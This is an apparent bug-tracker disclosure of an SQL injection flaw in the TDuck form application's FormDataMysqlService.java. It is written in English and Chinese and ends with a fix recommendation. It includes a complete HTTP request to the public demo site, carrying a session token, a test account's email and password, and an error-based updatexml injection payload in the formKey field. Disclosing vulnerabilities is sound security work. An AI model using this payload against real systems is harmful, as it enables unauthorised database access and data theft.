[vulnerability] Back-office management statistics function sql injection in FormDataMysqlService.java (FormDataMysqlService.java 存在后管SQL注入漏洞)

Question

[vulnerability] Back-office management statistics function sql injection in FormDataMysqlService.java (FormDataMysqlService.java 存在后管SQL注入漏洞)

Opened this issue 9 months ago · 0 comments

1.Steps to reproduce (复现步骤)

1.Use the demo environment on the official website for authentication (`https://demo.tduckapp.com/project`) and register a user using the registration function (1b7pl_dp@linshiyouxiang.net/123456) (使用官网的demo环境进行验证（`https://demo.tduckapp.com/project`），使用注册功能注册一个用户(1b7pl_dp@linshiyouxiang.net/123456))

2. Login and construct the following request, header in the Token replaced by the registered user login token, the parameter formKey value for malicious injection statement(登录并构造如下请求,header 中Token更换为注册的用户登录的token，参数formKey值为恶意注入语句)

POST /user/form/data/query?timestamp=1702986363697&sign=d40296262a3e99f608de2a9d7e435658 HTTP/1.1
Host: demo.tduckapp.com
Cookie: Hm_lvt_4dbdbc5421c41984499f878628d60f2f=1702985656; Hm_lpvt_4dbdbc5421c41984499f878628d60f2f=1702985890
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJzdWIiOiIyMTMyMSIsImlhdCI6MTcwMjk4NTg0NCwiZXhwIjoxNzAzNTkwNjQ0fQ.illpxfzf2O1AeJ3Ra3AHLgRufKgL9_KK1MAwfu0_l9C7GxSJT_ta9cDipGVWEhMijrS79N3lAksz7DgUzlhwUg
Content-Length: 122
Origin: https://demo.tduckapp.com
Referer: https://demo.tduckapp.com/project/form/data?key=MVWB25aE&active=data&type=1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

{"authGroupId":null,"formKey":"MVWB25aE' or updatexml(1,concat(0x7e,user(),0x7e),1)='1","filter":{},"size":10,"current":0}

3. Generate sql error page and successfully display `user()`, the vulnerability is successfully verified.(产生sql报错页面并成功回显`user()`，漏洞验证成功)

2. Vulnerability Existence Source Code Analysis（漏洞存在源码分析）

FormDataMysqlService.java 中对应的search 方法，对request传入的formKey参数未做任何限制，直接拼接sql进行执行

3. affected version （受影响版本）

This sqli affects the latest version of the curren(v4.0)

4.fixes Recommendations (修复建议)

Using precompiled binding parameters(使用预编译绑定参数)